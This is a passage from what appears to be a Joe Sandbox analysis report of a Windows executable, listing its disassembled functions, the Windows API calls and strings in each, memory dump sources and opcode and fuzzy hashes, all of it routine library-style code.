        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$DirectoryRemove$CloseFind
        • String ID:
        • API String ID: 973666142-0
        • Opcode ID: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
        • Instruction ID: 03362a2ccf4b717b56c6a34f179ab64da28c23ce81ae8a84700a7b8a0f7b2ecd
        • Opcode Fuzzy Hash: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
        • Instruction Fuzzy Hash: 8131E9718002789BCF21AF64EC41BEE3369AF14384F0548A5F945A7155EF74DEE5CB90
        Function 0014DB38 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0014A861,?,00000000,?,00000001,?,?,00000001,0014A861,?), ref: 0014DB85
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014DC0E
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001480A1,?), ref: 0014DC20
        • __freea.LIBCMT ref: 0014DC29
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
        • String ID:
        • API String ID: 2652629310-0
        • Opcode ID: 498e1a30c686b3e4cdf51112a901716ab3a57d91d3dada7e1a67b837e01bf897
        • Instruction ID: 05ab4535cc73260376a2af576ba9016659e290cf651c3b99d6a3b49201d35efc
        • Opcode Fuzzy Hash: 498e1a30c686b3e4cdf51112a901716ab3a57d91d3dada7e1a67b837e01bf897
        • Instruction Fuzzy Hash: 9031D072A0020AABDF259F64EC85EAF7BA5EF15720F054569FC08DB160EB35DD90CB90
        Function 0013B663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
        Download Yara Rule
        APIs
        • GetDC.USER32(00000000), ref: 0013B666
        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0013B675
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0013B683
        • ReleaseDC.USER32(00000000,00000000), ref: 0013B691
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CapsDevice$Release
        • String ID:
        • API String ID: 1035833867-0
        • Opcode ID: 371174f04d2542d4fe9294a3927138d6d92f2f17549678d51eec8b987bf1de2c
        • Instruction ID: 176e0fb6b15144537e48bbd1dcf95ec2a36c29c5251c0d04df815d424b988b29
        • Opcode Fuzzy Hash: 371174f04d2542d4fe9294a3927138d6d92f2f17549678d51eec8b987bf1de2c
        • Instruction Fuzzy Hash: 8EE01231A85F60A7D3201B60BC1DB9B3F95EF15713F580005F605A69D0DBB045808FE1
        Function 0014C368 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
        Download Yara Rule
        APIs
        • _free.LIBCMT ref: 0014C4D4
          • Part of subcall function 001451D6: IsProcessorFeaturePresent.KERNEL32(00000017,001451A8,00000050,00154ADC,?,0012EA30,00000004,00163070,?,?,001451B5,00000000,00000000,00000000,00000000,00000000), ref: 001451D8
          • Part of subcall function 001451D6: GetCurrentProcess.KERNEL32(C0000417,00154ADC,00000050,00163070), ref: 001451FA
          • Part of subcall function 001451D6: TerminateProcess.KERNEL32(00000000), ref: 00145201
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
        • String ID: *?$.
        • API String ID: 2667617558-3972193922
        • Opcode ID: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
        • Instruction ID: f59744187274c8ce416e31776cfaf2c7b9091fadf00e5e71400702f6d5beeb55
        • Opcode Fuzzy Hash: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
        • Instruction Fuzzy Hash: AD519E75E01209AFDF14DFA8C981ABDB7B5FF58310F29816AE854E7351E7319E018B90
        Function 001280BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 001280C3
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00128262
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
        • String ID: :
        • API String ID: 3226429890-336475711
        • Opcode ID: df23820a369c8c0119820330234f32e06a21354d7f11a4cb641754a47393e4bf
        • Instruction ID: ad66e2704ca0e861e89aabb0fae896e7f190568fd8c6213190c24a75aedb43c4
        • Opcode Fuzzy Hash: df23820a369c8c0119820330234f32e06a21354d7f11a4cb641754a47393e4bf
        • Instruction Fuzzy Hash: 06517071800678EAEB25EB60EC56EEEB37CEF55304F404095B609A6082DB745F99CF61
        Function 0013C66E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: }
        • API String ID: 176396367-4239843852
        • Opcode ID: 0d520944898d79d996beb478aebca38c7e693763dafcb87945dfc4465dcaeada
        • Instruction ID: 7ea069d81f21e05ddfcde3c659b9ff2babe78ecdd7d7ca0eb987cf48f404d2a8
        • Opcode Fuzzy Hash: 0d520944898d79d996beb478aebca38c7e693763dafcb87945dfc4465dcaeada
        • Instruction Fuzzy Hash: FA2121729083165AD731EB64DC46BABB3ECDF94760F10042AF944E7191EB60ED4C87E2
        Function 00130695 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00130620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0013063F
          • Part of subcall function 00130620: GetProcAddress.KERNEL32(0016A1F0,CryptUnprotectMemory), ref: 0013064F
        • GetCurrentProcessId.KERNEL32(?,00000200,?,00130690), ref: 00130723
        Strings
        • CryptUnprotectMemory failed, xrefs: 0013071B
        • CryptProtectMemory failed, xrefs: 001306DA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc$CurrentProcess
        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
        • API String ID: 2190909847-396321323
        • Opcode ID: ec48fe37bee4c363cf6dbd7ac15f134fe75fe8c4eb7f12b8bd29280170d868c1
        • Instruction ID: 901fd0dc51e2994f718b0d73710263db697aa8b8b253bb674e395f00d0536b76
        • Opcode Fuzzy Hash: ec48fe37bee4c363cf6dbd7ac15f134fe75fe8c4eb7f12b8bd29280170d868c1
        • Instruction Fuzzy Hash: 05115631A00624ABDB169F34ACA1A6E3B98EF58764F024115FC417F291DB70ADD18ED5
        Function 0012CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
        Download Yara Rule
        APIs
        • _swprintf.LIBCMT ref: 0012CDE7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: __vswprintf_c_l_swprintf
        • String ID: %c:\
        • API String ID: 1543624204-3142399695
        • Opcode ID: 03c6028315cbaf581e806db3aac288330464f663fed1deffbbc2942157377f68
        • Instruction ID: a79fa3e33d086c6dce2d1a6fcbc7ef18157800f02c048a251d3a651f08b5a045
        • Opcode Fuzzy Hash: 03c6028315cbaf581e806db3aac288330464f663fed1deffbbc2942157377f68
        • Instruction Fuzzy Hash: B501F5631043317ADA306B79AC47D6FABBCEFA5760B41441AF554C6092EB30D860C2E1
        Function 00132337 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
        Download Yara Rule
        APIs
        • CreateThread.KERNEL32(00000000,00010000,00132470,?,00000000,00000000), ref: 0013235B
        • SetThreadPriority.KERNEL32(?,00000000), ref: 001323A2
          • Part of subcall function 001276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00127707
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Thread$CreatePriority__vswprintf_c_l
        • String ID: CreateThread failed
        • API String ID: 2655393344-3849766595
        • Opcode ID: 2e6cec63bc1cb9a75f97d293f6ad4e0b3c87401e9f29959bb642d870bb010b65
        • Instruction ID: 943132bd79719bcb3e6aeb0d0c580a2ced515488b5a639aeab85a1ca8b56c933
        • Opcode Fuzzy Hash: 2e6cec63bc1cb9a75f97d293f6ad4e0b3c87401e9f29959bb642d870bb010b65
        • Instruction Fuzzy Hash: 8B01D6B5644706AFE3247F64EC81F62B399FB54712F20012DF652661C0CBF1A8948625
        Function 001322FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
        Download Yara Rule
        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,00132516,?), ref: 00132302
        • GetLastError.KERNEL32(?), ref: 0013230E
          • Part of subcall function 001276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00127707
        Strings
        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00132317
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
        • String ID: WaitForMultipleObjects error %d, GetLastError %d
        • API String ID: 1091760877-2248577382
        • Opcode ID: 0f9a597db5841a609985f68a0d1c66069538091f2ff5e6de1ed16540ff75f52c
        • Instruction ID: ba5a8e5a2d63d8fedd7d21f5aa544b7d0e74ff18cec004544b4153896a0e9a15
        • Opcode Fuzzy Hash: 0f9a597db5841a609985f68a0d1c66069538091f2ff5e6de1ed16540ff75f52c
        • Instruction Fuzzy Hash: 05D05E32908A31B7D61133287C0ADAF7915AF32775F740B54F7396A6E1DBB009E182A6
        Function 0012F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
        Download Yara Rule
        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,0012ED75,?), ref: 0012F5C3
        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0012ED75,?), ref: 0012F5D1
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FindHandleModuleResource
        • String ID: RTL
        • API String ID: 3537982541-834975271
        • Opcode ID: e8a9737b0b79247ce2eb764ebe96b43a643dc94d24dbc0e2c3e0bda7767f5d88
        • Instruction ID: 4348aa2d6d97b42d1328ad4b841d38e24a6baf7fc0801305a4a5655d38bb13e0
        • Opcode Fuzzy Hash: e8a9737b0b79247ce2eb764ebe96b43a643dc94d24dbc0e2c3e0bda7767f5d88
        • Instruction Fuzzy Hash: C9C01231244350D7F63027717C0DBC32EA85B0071AF15045CB601DE5C0DBF5C8C58660